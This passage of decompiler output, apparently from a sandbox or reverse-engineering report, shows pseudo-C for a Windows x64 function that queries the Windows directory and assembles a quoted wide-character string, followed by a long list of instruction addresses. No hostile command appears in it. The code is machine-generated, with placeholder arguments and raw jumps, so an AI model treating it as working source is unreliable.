				E00007FF77FF768C72C80(0,  &(_t1376[0x8e]));
				_t1376[0xa0] = 0;
				_t1376[0xa1] = 2;
				_t1376[0xa2] = 0;
				r8d = 0x200;
				_t1376[0xa5] = _t1056;
				_t1376[0xb2] = _t1056;
				r14d = 0;
				_t957 = _t1421 - 0x201;
				if (_t957 < 0) goto 0x68c6d7c7;
				goto 0x68c6d7d6;
				if (_t957 >= 0) goto 0x68c6d89d;
				if (_t1421 - 0x201 >= 0) goto 0x68c6d7d6;
				r15d = 0x200;
				goto 0x68c6d838;
				_t1422 = _t1421 - _t1365;
				if (_t1484 - _t1365 - _t1422 >= 0) goto 0x68c6d80c;
				E00007FF77FF768DBDB10(_t1484 - _t1365 - _t1422,  &(_t1376[0xa0]), _t1365, _t1422);
				_t1376[0xb2] = _t1376[0xa0];
				_t1058 = _t1376[0xa1];
				_t1376[0xa5] = _t1058;
				_t1486 = _t1376[0xb2];
				_t1366 =  <  ? _t1486 : _t1365;
				_t1376[0xa2] = _t1366;
				_t1502 = _t1366;
				_t1108 = _t1366;
				SetLastError(??);
				_t681 = GetWindowsDirectoryW(??, ??);
				r12d = _t681;
				if (_t681 != 0) goto 0x68c6d85f;
				if (GetLastError() != 0) goto 0x68c6e8ea;
				r8d = r12d;
				if (_t1108 != _t1422) goto 0x68c6d7b1;
				if (GetLastError() != 0x7a) goto 0x68c6f348;
				_t1110 =  >=  ? _t1058 : _t1108 + _t1108;
				_t1423 = _t1110;
				if (_t1423 - 0x201 >= 0) goto 0x68c6d7d6;
				goto 0x68c6d7c7;
				if (_t1502 - _t1423 < 0) goto 0x68c6f3cc;
				E00007FF77FF768C5EC50(0xffffffff, _t816 & 0x000003ff | 0x0000dc00, _t1058,  &(_t1376[0xa6]), _t1376[0xa5], _t1423);
				0x68c65350();
				if (_t1376[0xb5] == 1) goto 0x68c6d8dd;
				0x68c6b830();
				_t1367 = _t1376[0xa7];
				_t1301 = _t1367; // executed
				E00007FF77FF768C72B30(_t816 & 0x000003ff | 0x0000dc00, _t1376[0xb5] - 1,  &(_t1376[0x9a]), _t1301, _t1376[0xa8]); // executed
				if (_t1376[0xa6] == 0) goto 0x68c6d916;
				HeapFree(??, ??, ??);
				asm("movdqu xmm0, [ebp+0x4d0]");
				asm("movdqu [ebp+0x478], xmm0");
				_t1059 = _t1376[0x9c];
				_t1376[0x91] = _t1059;
				_t1376[0x8e] = 0;
				goto 0x68c6e90c;
				_t1230 =  !=  ? _t1059 : _t1367 + _t1301 + 1;
				if (_t1230 == 0) goto 0x68c6d978;
				_t1427 =  ==  ? _t1110 : _t1367;
				_t1231 = _t1230 + ( ==  ? _t1110 : _t1367);
				_t1232 = _t1230 + ( ==  ? _t1110 : _t1367) - _t1502;
				if (_t1486 - _t1232 < 0) goto 0x68c6d978;
				_t1376[0xa8] = _t1232;
				E00007FF77FF768C643D0(_t816 & 0x000003ff | 0x0000dc00, 0, 0, _t1486 - _t1232,  &(_t1376[0x8e]), _t1502, _t1232);
				if (_t1376[0xa6] == 0) goto 0x68c6d9a6;
				HeapFree(??, ??, ??);
				_t1454 = _t1376[0xb3];
				_t1111 = _t1376[0x8f];
				if (_t1111 == 0) goto 0x68c6db56;
				_t1376[0xb1] = _t1376[0x8e];
				_t1342 = _t1376[0x90];
				_t1376[0xb2] = _t1111;
				if (_t1342 - 5 < 0) goto 0x68c6d9f3;
				if ( *((short*)(_t1111 + _t1342 * 2 - 0xa)) != 0x2e) goto 0x68c6d9f3;
				if ( *((short*)(_t1111 + _t1342 * 2 - 2)) == 0) goto 0x68c6dd6e;
				_t1343 =  *((intOrPtr*)(_t1454 + 0x98));
				r14b =  *((intOrPtr*)(_t1454 + 0xad));
				_t1376[0xa6] = 0;
				_t1376[0xa7] = 2;
				_t1376[0xa8] = 0;
				_t690 = E00007FF77FF768C5DEB0( *((short*)(_t1111 + _t1342 * 2 - 2)),  &(_t1376[0xa6]), _t1502, _t1502);
				_t1236 = _t1376[0xa8];
				 *((short*)(_t1376[0xa7] + _t1236 * 2)) = 0x22;
				_t1376[0xa8] = _t1236 + 1;
				_t1061 = _t1376[0xb7];
				 *(_t1376 - 0x30) = _t1463 + _t1061;
				 *(_t1376 - 0x28) = _t1061;
				 *(_t1376 - 0x20) = 0;
				E00007FF77FF768C5DD60(_t690,  &(_t1376[0xa6]), _t1376 - 0x30);
				if (_t1376[0xa8] != _t1376[0xa6]) goto 0x68c6daa3;
				E00007FF77FF768C5DEB0(_t1376[0xa8] - _t1376[0xa6],  &(_t1376[0xa6]), _t1376[0xa8], _t1502);
				_t1306 = _t1376[0xa8];
				 *((short*)(_t1376[0xa7] + _t1306 * 2)) = 0x22;
				_t1376[0xa8] = _t1306 + 1;
				if (_t1343 == _t1343 + ( *(_t1454 + 0xa0) +  *(_t1454 + 0xa0) * 4) * 8) goto 0x68c6db7d;
				if (_t1376[0xa8] != _t1376[0xa6]) goto 0x68c6daf8;
				E00007FF77FF768C5DEB0(_t1376[0xa8] - _t1376[0xa6],  &(_t1376[0xa6]), _t1376[0xa8], _t1502);
				_t1309 = _t1376[0xa8];
				_t1064 = _t1376[0xa7];
				 *((short*)(_t1064 + _t1309 * 2)) = 0x20;
				_t1376[0xa8] = _t1309 + 1;
				r8d = r14d;
				E00007FF77FF768C73300(_t719,  &(_t1376[0xa6]), _t1343, 0x68e2dd78);
				if (_t1064 == 0) goto 0x68c6dad0;
				_t1376[0xb7] = _t1064;
				if (_t1376[0xa6] == 0) goto 0x68c6dcaf;
				HeapFree(??, ??, ??);
				goto 0x68c6dcaf;
				_t1065 = _t1376[0x9e];
				 *_t1065 = _t1343 + 0x28;
				 *((long long*)(_t1065 + 0x10)) = 2;
				if (_t1376[0xb1] != 0) goto 0x68c6dcf6;
				goto 0x68c6dd4c;
				_t1113 = _t1376[0xa6];
				_t1345 = _t1376[0xa7];
				if (_t1345 == 0) goto 0x68c6dca8;
				_t1370 = _t1376[0xa8];
				_t1376[0xa5] = _t1376[0xb2];
				_t1376[0xb7] = _t1376[0xb1];
				_t1376[0x8a] = _t1113;
				_t1376[0x8b] = _t1345;
				_t1376[0x8c] = _t1370;
				if (_t1370 != _t1113) goto 0x68c6dbf5;
				_t1376[0xb8] = 1;
				E00007FF77FF768C5DEB0(_t1370 - _t1113,  &(_t1376[0x8a]), _t1370, _t1376[0xa7]);
				_t1371 = _t1376[0x8c];
				 *((short*)(_t1376[0x8b] + _t1371 * 2)) = 0;
				_t1376[0x8c] = _t1371 + 1;
				r13d = 0x608;
				r13d =  ==  ? 0x400 : r13d;
				r13d = r13d |  *(_t1454 + 0xa8);
				r15d = 2;
				r14d = 0;
				if (_t1376[0x82] != 1) goto 0x68c6e48b;
				_t1114 = _t1376[0x85];
				_t1376[0x7c] = _t1376[0x83];
				_t1376[0x7d] = _t1376[0x84];
				_t1376[0x7e] = _t1114;
				_t1376[0xa0] = 0;
				_t1376[0xa1] = 2;
				_t1376[0xa2] = 0;
				if (_t1114 == 0) goto 0x68c6df0c;
				r14d = 2;
				r12d = 0;
				goto 0x68c6df40;
				_t1376[0xb7] = _t1114;
				_t1069 = _t1376[0x9e];
				 *_t1069 = _t1376[0xb7];
				 *((long long*)(_t1069 + 0x10)) = 2;
				if (_t1376[0xb1] == 0) goto 0x68c6dcea;
				HeapFree(??, ??, ??);
				if (_t1376[0x82] == 0) goto 0x68c6dd4c;
				_t1246 = _t1376[0x84];
				if (_t1246 == 0) goto 0x68c6dd2c;
				_t1314 = _t1376[0x83];
				 *(_t1376 - 0x30) = 0;
				 *(_t1376 - 0x28) = _t1314;
				 *(_t1376 - 0x20) = _t1246;
				 *(_t1376 - 8) = _t1314;
				 *_t1376 = _t1246;
				goto 0x68c6dd3b;
				 *(_t1376 - 0x30) = 2;
				 *(_t1376 - 0x10) = _t1246;
				_t1376[2] = _t1376[0x85];
				0x68c73850();
				asm("movaps xmm6, [ebp+0x5d0]");
				asm("movaps xmm7, [ebp+0x5e0]");
				return 0;
			}















































































































































                                                                                          0x7ff768c6c090
                                                                                          0x7ff768c6c092
                                                                                          0x7ff768c6c094
                                                                                          0x7ff768c6c095
                                                                                          0x7ff768c6c096
                                                                                          0x7ff768c6c097
                                                                                          0x7ff768c6c098
                                                                                          0x7ff768c6c099
                                                                                          0x7ff768c6c09a
                                                                                          0x7ff768c6c09b
                                                                                          0x7ff768c6c09c
                                                                                          0x7ff768c6c09d
                                                                                          0x7ff768c6c09e
                                                                                          0x7ff768c6c09f
                                                                                          0x7ff768c6c0ac
                                                                                          0x7ff768c6c0b3
                                                                                          0x7ff768c6c0bb
                                                                                          0x7ff768c6c0c3
                                                                                          0x7ff768c6c0cb
                                                                                          0x7ff768c6c0d9
                                                                                          0x7ff768c6c0e0
                                                                                          0x7ff768c6c0ea
                                                                                          0x7ff768c6c0f1
                                                                                          0x7ff768c6c0f6
                                                                                          0x7ff768c6c0f8
                                                                                          0x7ff768c6c105
                                                                                          0x7ff768c6c10e
                                                                                          0x7ff768c6c113
                                                                                          0x7ff768c6c117
                                                                                          0x7ff768c6c121
                                                                                          0x7ff768c6c127
                                                                                          0x7ff768c6c12e
                                                                                          0x7ff768c6c137
                                                                                          0x7ff768c6c13d
                                                                                          0x7ff768c6c147
                                                                                          0x7ff768c6c154
                                                                                          0x7ff768c6c15a
                                                                                          0x7ff768c6c166
                                                                                          0x7ff768c6c170
                                                                                          0x7ff768c6c17d
                                                                                          0x7ff768c6c185
                                                                                          0x7ff768c6c18b
                                                                                          0x7ff768c6c190
                                                                                          0x7ff768c6c19d
                                                                                          0x7ff768c6c1a0
                                                                                          0x7ff768c6c1a7
                                                                                          0x7ff768c6c1a9
                                                                                          0x7ff768c6c1b4
                                                                                          0x7ff768c6c1b6
                                                                                          0x7ff768c6c1c0
                                                                                          0x7ff768c6c1c8
                                                                                          0x7ff768c6c1d8
                                                                                          0x7ff768c6c1dd
                                                                                          0x7ff768c6c1e5
                                                                                          0x7ff768c6c202
                                                                                          0x7ff768c6c20e
                                                                                          0x7ff768c6c215
                                                                                          0x7ff768c6c21c
                                                                                          0x7ff768c6c22a
                                                                                          0x7ff768c6c236
                                                                                          0x7ff768c6c239
                                                                                          0x7ff768c6c23c
                                                                                          0x7ff768c6c243
                                                                                          0x7ff768c6c24e
                                                                                          0x7ff768c6c252
                                                                                          0x7ff768c6c265
                                                                                          0x7ff768c6c26a
                                                                                          0x7ff768c6c26e
                                                                                          0x7ff768c6c274
                                                                                          0x7ff768c6c27b
                                                                                          0x7ff768c6c281
                                                                                          0x7ff768c6c288
                                                                                          0x7ff768c6c28f
                                                                                          0x7ff768c6c29a
                                                                                          0x7ff768c6c2a5
                                                                                          0x7ff768c6c2b2
                                                                                          0x7ff768c6c2b5
                                                                                          0x7ff768c6c2b9
                                                                                          0x7ff768c6c2c0
                                                                                          0x7ff768c6c2ce
                                                                                          0x7ff768c6c2d5
                                                                                          0x7ff768c6c2dd
                                                                                          0x7ff768c6c2e5
                                                                                          0x7ff768c6c2f8
                                                                                          0x7ff768c6c2ff
                                                                                          0x7ff768c6c302
                                                                                          0x7ff768c6c304
                                                                                          0x7ff768c6c315
                                                                                          0x7ff768c6c31c
                                                                                          0x7ff768c6c323
                                                                                          0x7ff768c6c33d
                                                                                          0x7ff768c6c342
                                                                                          0x7ff768c6c349
                                                                                          0x7ff768c6c354
                                                                                          0x7ff768c6c358
                                                                                          0x7ff768c6c368
                                                                                          0x7ff768c6c36c
                                                                                          0x7ff768c6c36f
                                                                                          0x7ff768c6c372
                                                                                          0x7ff768c6c379
                                                                                          0x7ff768c6c37d
                                                                                          0x7ff768c6c384
                                                                                          0x7ff768c6c387
                                                                                          0x7ff768c6c38b
                                                                                          0x7ff768c6c38f
                                                                                          0x7ff768c6c396
                                                                                          0x7ff768c6c39e
                                                                                          0x7ff768c6c3ba
                                                                                          0x7ff768c6c3c6
                                                                                          0x7ff768c6c3d4
                                                                                          0x7ff768c6c3ea
                                                                                          0x7ff768c6c3f0
                                                                                          0x7ff768c6c3fc
                                                                                          0x7ff768c6c410
                                                                                          0x7ff768c6c41d
                                                                                          0x7ff768c6c421
                                                                                          0x7ff768c6c428
                                                                                          0x7ff768c6c42b
                                                                                          0x7ff768c6c432
                                                                                          0x7ff768c6c437
                                                                                          0x7ff768c6c43b
                                                                                          0x7ff768c6c443
                                                                                          0x7ff768c6c450
                                                                                          0x7ff768c6c45a
                                                                                          0x7ff768c6c460
                                                                                          0x7ff768c6c468
                                                                                          0x7ff768c6c46e
                                                                                          0x7ff768c6c474
                                                                                          0x7ff768c6c479
                                                                                          0x7ff768c6c47e
                                                                                          0x7ff768c6c483
                                                                                          0x7ff768c6c490
                                                                                          0x7ff768c6c495
                                                                                          0x7ff768c6c49a
                                                                                          0x7ff768c6c49d
                                                                                          0x7ff768c6c49f
                                                                                          0x7ff768c6c4aa
                                                                                          0x7ff768c6c4ba
                                                                                          0x7ff768c6c4bc
                                                                                          0x7ff768c6c4c0
                                                                                          0x7ff768c6c4c2
                                                                                          0x7ff768c6c4fa
                                                                                          0x7ff768c6c50c
                                                                                          0x7ff768c6c50e
                                                                                          0x7ff768c6c51e
                                                                                          0x7ff768c6c521
                                                                                          0x7ff768c6c527
                                                                                          0x7ff768c6c530
                                                                                          0x7ff768c6c53a
                                                                                          0x7ff768c6c540
                                                                                          0x7ff768c6c548
                                                                                          0x7ff768c6c54b
                                                                                          0x7ff768c6c556
                                                                                          0x7ff768c6c558
                                                                                          0x7ff768c6c55b
                                                                                          0x7ff768c6c56f
                                                                                          0x7ff768c6c571
                                                                                          0x7ff768c6c57c
                                                                                          0x7ff768c6c581
                                                                                          0x7ff768c6c59a
                                                                                          0x7ff768c6c5a5
                                                                                          0x7ff768c6c5a9
                                                                                          0x7ff768c6c5ec
                                                                                          0x7ff768c6c5f0
                                                                                          0x7ff768c6c5f2
                                                                                          0x7ff768c6c600
                                                                                          0x7ff768c6c60a
                                                                                          0x7ff768c6c619
                                                                                          0x7ff768c6c620
                                                                                          0x7ff768c6c624
                                                                                          0x7ff768c6c62e
                                                                                          0x7ff768c6c63e
                                                                                          0x7ff768c6c653
                                                                                          0x7ff768c6c665
                                                                                          0x7ff768c6c672
                                                                                          0x7ff768c6c678
                                                                                          0x7ff768c6c68d
                                                                                          0x7ff768c6c694
                                                                                          0x7ff768c6c697
                                                                                          0x7ff768c6c6ab
                                                                                          0x7ff768c6c6bf
                                                                                          0x7ff768c6c6c4
                                                                                          0x7ff768c6c6e2
                                                                                          0x7ff768c6c6e7
                                                                                          0x7ff768c6c6ed
                                                                                          0x7ff768c6c6f1
                                                                                          0x7ff768c6c6f4
                                                                                          0x7ff768c6c6fa
                                                                                          0x7ff768c6c77c
                                                                                          0x7ff768c6c788
                                                                                          0x7ff768c6c793
                                                                                          0x7ff768c6c79a
                                                                                          0x7ff768c6c7b3
                                                                                          0x7ff768c6c7bf
                                                                                          0x7ff768c6c7c6
                                                                                          0x7ff768c6c7ca
                                                                                          0x7ff768c6c7d1
                                                                                          0x7ff768c6c7d6
                                                                                          0x7ff768c6c7da
                                                                                          0x7ff768c6c7de
                                                                                          0x7ff768c6c7e2
                                                                                          0x7ff768c6c7e9
                                                                                          0x7ff768c6c7f0
                                                                                          0x7ff768c6c7f7
                                                                                          0x7ff768c6c7ff
                                                                                          0x7ff768c6c803
                                                                                          0x7ff768c6c814
                                                                                          0x7ff768c6c81a
                                                                                          0x7ff768c6c820
                                                                                          0x7ff768c6c82a
                                                                                          0x7ff768c6c841
                                                                                          0x7ff768c6c843
                                                                                          0x7ff768c6c854
                                                                                          0x7ff768c6c858
                                                                                          0x7ff768c6c85b
                                                                                          0x7ff768c6c862
                                                                                          0x7ff768c6c864
                                                                                          0x7ff768c6c872
                                                                                          0x7ff768c6c87d
                                                                                          0x7ff768c6c87f
                                                                                          0x7ff768c6c892
                                                                                          0x7ff768c6c897
                                                                                          0x7ff768c6c89b
                                                                                          0x7ff768c6c8a2
                                                                                          0x7ff768c6c8a9
                                                                                          0x7ff768c6c8b0
                                                                                          0x7ff768c6c8ba
                                                                                          0x7ff768c6c8be
                                                                                          0x7ff768c6c8c1
                                                                                          0x7ff768c6c8c8
                                                                                          0x7ff768c6c8cf
                                                                                          0x7ff768c6c8d5
                                                                                          0x7ff768c6c8d9
                                                                                          0x7ff768c6c8e2
                                                                                          0x7ff768c6c8ed
                                                                                          0x7ff768c6c8fb
                                                                                          0x7ff768c6c8fd
                                                                                          0x7ff768c6c907
                                                                                          0x7ff768c6c90a
                                                                                          0x7ff768c6c90c
                                                                                          0x7ff768c6c912
                                                                                          0x7ff768c6c918
                                                                                          0x7ff768c6c921
                                                                                          0x7ff768c6c926
                                                                                          0x7ff768c6c92e
                                                                                          0x7ff768c6c935
                                                                                          0x7ff768c6c93a
                                                                                          0x7ff768c6c93e
                                                                                          0x7ff768c6c942
                                                                                          0x7ff768c6c946
                                                                                          0x7ff768c6c94e
                                                                                          0x7ff768c6c952
                                                                                          0x7ff768c6c955
                                                                                          0x7ff768c6c957
                                                                                          0x7ff768c6c965
                                                                                          0x7ff768c6c970
                                                                                          0x7ff768c6c972
                                                                                          0x7ff768c6c985
                                                                                          0x7ff768c6c98e
                                                                                          0x7ff768c6c995
                                                                                          0x7ff768c6c99c
                                                                                          0x7ff768c6c9a3
                                                                                          0x7ff768c6c9a9
                                                                                          0x7ff768c6c9c9
                                                                                          0x7ff768c6c9dc
                                                                                          0x7ff768c6c9ea
                                                                                          0x7ff768c6c9f7
                                                                                          0x7ff768c6ca00
                                                                                          0x7ff768c6ca06
                                                                                          0x7ff768c6ca0b
                                                                                          0x7ff768c6ca16
                                                                                          0x7ff768c6ca1d
                                                                                          0x7ff768c6ca24
                                                                                          0x7ff768c6ca36
                                                                                          0x7ff768c6ca3b
                                                                                          0x7ff768c6ca42
                                                                                          0x7ff768c6ca52
                                                                                          0x7ff768c6ca59
                                                                                          0x7ff768c6ca61
                                                                                          0x7ff768c6ca69
                                                                                          0x7ff768c6ca71
                                                                                          0x7ff768c6ca78
                                                                                          0x7ff768c6ca7f
                                                                                          0x7ff768c6ca8d
                                                                                          0x7ff768c6ca95
                                                                                          0x7ff768c6ca9c
                                                                                          0x7ff768c6caa3
                                                                                          0x7ff768c6caaa
                                                                                          0x7ff768c6cab2
                                                                                          0x7ff768c6caba
                                                                                          0x7ff768c6cac2
                                                                                          0x7ff768c6cac6
                                                                                          0x7ff768c6cad2
                                                                                          0x7ff768c6cad6
                                                                                          0x7ff768c6cae0
                                                                                          0x7ff768c6cae3
                                                                                          0x7ff768c6cae7
                                                                                          0x7ff768c6caeb
                                                                                          0x7ff768c6caf7
                                                                                          0x7ff768c6cafb
                                                                                          0x7ff768c6cb02
                                                                                          0x7ff768c6cb06
                                                                                          0x7ff768c6cb0e
                                                                                          0x7ff768c6cb15
                                                                                          0x7ff768c6cb1c
                                                                                          0x7ff768c6cb23
                                                                                          0x7ff768c6cb27
                                                                                          0x7ff768c6cb2b
                                                                                          0x7ff768c6cb2f
                                                                                          0x7ff768c6cb3b
                                                                                          0x7ff768c6cb42
                                                                                          0x7ff768c6cb46
                                                                                          0x7ff768c6cb4d
                                                                                          0x7ff768c6cb52
                                                                                          0x7ff768c6cb56
                                                                                          0x7ff768c6cb5a
                                                                                          0x7ff768c6cb5e
                                                                                          0x7ff768c6cb65
                                                                                          0x7ff768c6cb6c
                                                                                          0x7ff768c6cb73
                                                                                          0x7ff768c6cb7a
                                                                                          0x7ff768c6cb89
                                                                                          0x7ff768c6cb8e
                                                                                          0x7ff768c6cb94
                                                                                          0x7ff768c6cb9b
                                                                                          0x7ff768c6cba5
                                                                                          0x7ff768c6cbac
                                                                                          0x7ff768c6cbc3
                                                                                          0x7ff768c6cbd0
                                                                                          0x7ff768c6cc04
                                                                                          0x7ff768c6cc16
                                                                                          0x7ff768c6cc1f
                                                                                          0x7ff768c6cc2d
                                                                                          0x7ff768c6cc39
                                                                                          0x7ff768c6cc42
                                                                                          0x7ff768c6cc54
                                                                                          0x7ff768c6cc5a
                                                                                          0x7ff768c6cc5f
                                                                                          0x7ff768c6cc66
                                                                                          0x7ff768c6cc6d
                                                                                          0x7ff768c6cc75
                                                                                          0x7ff768c6cc7d
                                                                                          0x7ff768c6cc92
                                                                                          0x7ff768c6cc9a
                                                                                          0x7ff768c6cca0
                                                                                          0x7ff768c6cca6
                                                                                          0x7ff768c6ccb1
                                                                                          0x7ff768c6ccb8
                                                                                          0x7ff768c6ccc3
                                                                                          0x7ff768c6ccd1
                                                                                          0x7ff768c6ccd5
                                                                                          0x7ff768c6ccd9
                                                                                          0x7ff768c6cce6
                                                                                          0x7ff768c6ccea
                                                                                          0x7ff768c6ccef
                                                                                          0x7ff768c6ccf6
                                                                                          0x7ff768c6ccfd
                                                                                          0x7ff768c6cd01
                                                                                          0x7ff768c6cd05
                                                                                          0x7ff768c6cd0d
                                                                                          0x7ff768c6cd19
                                                                                          0x7ff768c6cd21
                                                                                          0x7ff768c6cd32
                                                                                          0x7ff768c6cd3f
                                                                                          0x7ff768c6cd5b
                                                                                          0x7ff768c6cd66
                                                                                          0x7ff768c6cd83
                                                                                          0x7ff768c6cd8d
                                                                                          0x7ff768c6cd91
                                                                                          0x7ff768c6cd9e
                                                                                          0x7ff768c6cdb1
                                                                                          0x7ff768c6cdb3
                                                                                          0x7ff768c6cdb6
                                                                                          0x7ff768c6cdb8
                                                                                          0x7ff768c6cdba
                                                                                          0x7ff768c6cdd9
                                                                                          0x7ff768c6cddf
                                                                                          0x7ff768c6cdf5
                                                                                          0x7ff768c6cdfd
                                                                                          0x7ff768c6ce04
                                                                                          0x7ff768c6ce12
                                                                                          0x7ff768c6ce20
                                                                                          0x7ff768c6ce22
                                                                                          0x7ff768c6ce2b
                                                                                          0x7ff768c6ce3a
                                                                                          0x7ff768c6ce45
                                                                                          0x7ff768c6ce53
                                                                                          0x7ff768c6ce5e
                                                                                          0x7ff768c6ce65
                                                                                          0x7ff768c6ce6a
                                                                                          0x7ff768c6ce72
                                                                                          0x7ff768c6ce79
                                                                                          0x7ff768c6ce7f
                                                                                          0x7ff768c6ce88
                                                                                          0x7ff768c6ce8c
                                                                                          0x7ff768c6ce9d
                                                                                          0x7ff768c6ceae
                                                                                          0x7ff768c6ceb8
                                                                                          0x7ff768c6ceca
                                                                                          0x7ff768c6ced3
                                                                                          0x7ff768c6ceda
                                                                                          0x7ff768c6cee5
                                                                                          0x7ff768c6ceee
                                                                                          0x7ff768c6cf07
                                                                                          0x7ff768c6cf20
                                                                                          0x7ff768c6cf39
                                                                                          0x7ff768c6cf55
                                                                                          0x7ff768c6cf63
                                                                                          0x7ff768c6cf65
                                                                                          0x7ff768c6cf6c
                                                                                          0x7ff768c6cf74
                                                                                          0x7ff768c6cf78
                                                                                          0x7ff768c6cf7e
                                                                                          0x7ff768c6cf8f
                                                                                          0x7ff768c6cf92
                                                                                          0x7ff768c6cf97
                                                                                          0x7ff768c6cf9c
                                                                                          0x7ff768c6cfa1
                                                                                          0x7ff768c6cfa3
                                                                                          0x7ff768c6cfb5
                                                                                          0x7ff768c6cfc2
                                                                                          0x7ff768c6cfc7
                                                                                          0x7ff768c6cfcd
                                                                                          0x7ff768c6cfd6
                                                                                          0x7ff768c6cfd8
                                                                                          0x7ff768c6cfdb
                                                                                          0x7ff768c6cff0
                                                                                          0x7ff768c6cff6
                                                                                          0x7ff768c6d000
                                                                                          0x7ff768c6d00d
                                                                                          0x7ff768c6d01c
                                                                                          0x7ff768c6d02c
                                                                                          0x7ff768c6d035
                                                                                          0x7ff768c6d040
                                                                                          0x7ff768c6d042
                                                                                          0x7ff768c6d054
                                                                                          0x7ff768c6d065
                                                                                          0x7ff768c6d067
                                                                                          0x7ff768c6d06e
                                                                                          0x7ff768c6d074
                                                                                          0x7ff768c6d07a
                                                                                          0x7ff768c6d083
                                                                                          0x7ff768c6d08b
                                                                                          0x7ff768c6d09d
                                                                                          0x7ff768c6d0a2
                                                                                          0x7ff768c6d0a9
                                                                                          0x7ff768c6d0b0
                                                                                          0x7ff768c6d0b7
                                                                                          0x7ff768c6d0c5
                                                                                          0x7ff768c6d0d0
                                                                                          0x7ff768c6d0d9
                                                                                          0x7ff768c6d0e3
                                                                                          0x7ff768c6d0ee
                                                                                          0x7ff768c6d0f8
                                                                                          0x7ff768c6d103
                                                                                          0x7ff768c6d112
                                                                                          0x7ff768c6d118
                                                                                          0x7ff768c6d11d
                                                                                          0x7ff768c6d122
                                                                                          0x7ff768c6d126
                                                                                          0x7ff768c6d12d
                                                                                          0x7ff768c6d135
                                                                                          0x7ff768c6d13c
                                                                                          0x7ff768c6d143
                                                                                          0x7ff768c6d154
                                                                                          0x7ff768c6d15e
                                                                                          0x7ff768c6d160
                                                                                          0x7ff768c6d164
                                                                                          0x7ff768c6d16b
                                                                                          0x7ff768c6d170
                                                                                          0x7ff768c6d178
                                                                                          0x7ff768c6d184
                                                                                          0x7ff768c6d18c
                                                                                          0x7ff768c6d18f
                                                                                          0x7ff768c6d197
                                                                                          0x7ff768c6d1a1
                                                                                          0x7ff768c6d1ac
                                                                                          0x7ff768c6d1ae
                                                                                          0x7ff768c6d1b6
                                                                                          0x7ff768c6d1c6
                                                                                          0x7ff768c6d1ce
                                                                                          0x7ff768c6d1d7
                                                                                          0x7ff768c6d1e4
                                                                                          0x7ff768c6d1ea
                                                                                          0x7ff768c6d1f0
                                                                                          0x7ff768c6d1f2
                                                                                          0x7ff768c6d1fe
                                                                                          0x7ff768c6d204
                                                                                          0x7ff768c6d213
                                                                                          0x7ff768c6d227
                                                                                          0x7ff768c6d236
                                                                                          0x7ff768c6d23f
                                                                                          0x7ff768c6d24a
                                                                                          0x7ff768c6d24f
                                                                                          0x7ff768c6d25e
                                                                                          0x7ff768c6d263
                                                                                          0x7ff768c6d26a
                                                                                          0x7ff768c6d271
                                                                                          0x7ff768c6d27b
                                                                                          0x7ff768c6d285
                                                                                          0x7ff768c6d287
                                                                                          0x7ff768c6d28a
                                                                                          0x7ff768c6d291
                                                                                          0x7ff768c6d298
                                                                                          0x7ff768c6d2a1
                                                                                          0x7ff768c6d2a8
                                                                                          0x7ff768c6d2ba
                                                                                          0x7ff768c6d2c5
                                                                                          0x7ff768c6d2cb
                                                                                          0x7ff768c6d2d9
                                                                                          0x7ff768c6d2e5
                                                                                          0x7ff768c6d2e7
                                                                                          0x7ff768c6d2f5
                                                                                          0x7ff768c6d2fa
                                                                                          0x7ff768c6d2ff
                                                                                          0x7ff768c6d307
                                                                                          0x7ff768c6d30e
                                                                                          0x7ff768c6d316
                                                                                          0x7ff768c6d324
                                                                                          0x7ff768c6d32b
                                                                                          0x7ff768c6d332
                                                                                          0x7ff768c6d335
                                                                                          0x7ff768c6d33d
                                                                                          0x7ff768c6d342
                                                                                          0x7ff768c6d344
                                                                                          0x7ff768c6d34b
                                                                                          0x7ff768c6d35a
                                                                                          0x7ff768c6d35e
                                                                                          0x7ff768c6d365
                                                                                          0x7ff768c6d369
                                                                                          0x7ff768c6d378
                                                                                          0x7ff768c6d38c
                                                                                          0x7ff768c6d392
                                                                                          0x7ff768c6d397
                                                                                          0x7ff768c6d3a9
                                                                                          0x7ff768c6d3b3
                                                                                          0x7ff768c6d3be
                                                                                          0x7ff768c6d3c1
                                                                                          0x7ff768c6d3d1
                                                                                          0x7ff768c6d3e1
                                                                                          0x7ff768c6d3e6
                                                                                          0x7ff768c6d3f1
                                                                                          0x7ff768c6d3fc
                                                                                          0x7ff768c6d407
                                                                                          0x7ff768c6d412
                                                                                          0x7ff768c6d41b
                                                                                          0x7ff768c6d422
                                                                                          0x7ff768c6d425
                                                                                          0x7ff768c6d428
                                                                                          0x7ff768c6d42f
                                                                                          0x7ff768c6d431
                                                                                          0x7ff768c6d433
                                                                                          0x7ff768c6d447
                                                                                          0x7ff768c6d454
                                                                                          0x7ff768c6d462
                                                                                          0x7ff768c6d464
                                                                                          0x7ff768c6d470
                                                                                          0x7ff768c6d479
                                                                                          0x7ff768c6d485
                                                                                          0x7ff768c6d491
                                                                                          0x7ff768c6d498
                                                                                          0x7ff768c6d49f
                                                                                          0x7ff768c6d4b5
                                                                                          0x7ff768c6d4bb
                                                                                          0x7ff768c6d4bf
                                                                                          0x7ff768c6d4d0
                                                                                          0x7ff768c6d4d5
                                                                                          0x7ff768c6d4e0
                                                                                          0x7ff768c6d4e6
                                                                                          0x7ff768c6d4eb
                                                                                          0x7ff768c6d4f4
                                                                                          0x7ff768c6d4fa
                                                                                          0x7ff768c6d500
                                                                                          0x7ff768c6d50e
                                                                                          0x7ff768c6d51f
                                                                                          0x7ff768c6d523
                                                                                          0x7ff768c6d52d
                                                                                          0x7ff768c6d533
                                                                                          0x7ff768c6d53b
                                                                                          0x7ff768c6d54b
                                                                                          0x7ff768c6d55d
                                                                                          0x7ff768c6d56a
                                                                                          0x7ff768c6d573
                                                                                          0x7ff768c6d578
                                                                                          0x7ff768c6d590
                                                                                          0x7ff768c6d59d
                                                                                          0x7ff768c6d5ab
                                                                                          0x7ff768c6d5b1
                                                                                          0x7ff768c6d5b9
                                                                                          0x7ff768c6d5c1
                                                                                          0x7ff768c6d5c8
                                                                                          0x7ff768c6d5cf
                                                                                          0x7ff768c6d5dc
                                                                                          0x7ff768c6d5e1
                                                                                          0x7ff768c6d5f3
                                                                                          0x7ff768c6d5f5
                                                                                          0x7ff768c6d600
                                                                                          0x7ff768c6d60d
                                                                                          0x7ff768c6d618
                                                                                          0x7ff768c6d626
                                                                                          0x7ff768c6d62d
                                                                                          0x7ff768c6d632
                                                                                          0x7ff768c6d634
                                                                                          0x7ff768c6d63d
                                                                                          0x7ff768c6d640
                                                                                          0x7ff768c6d645
                                                                                          0x7ff768c6d649
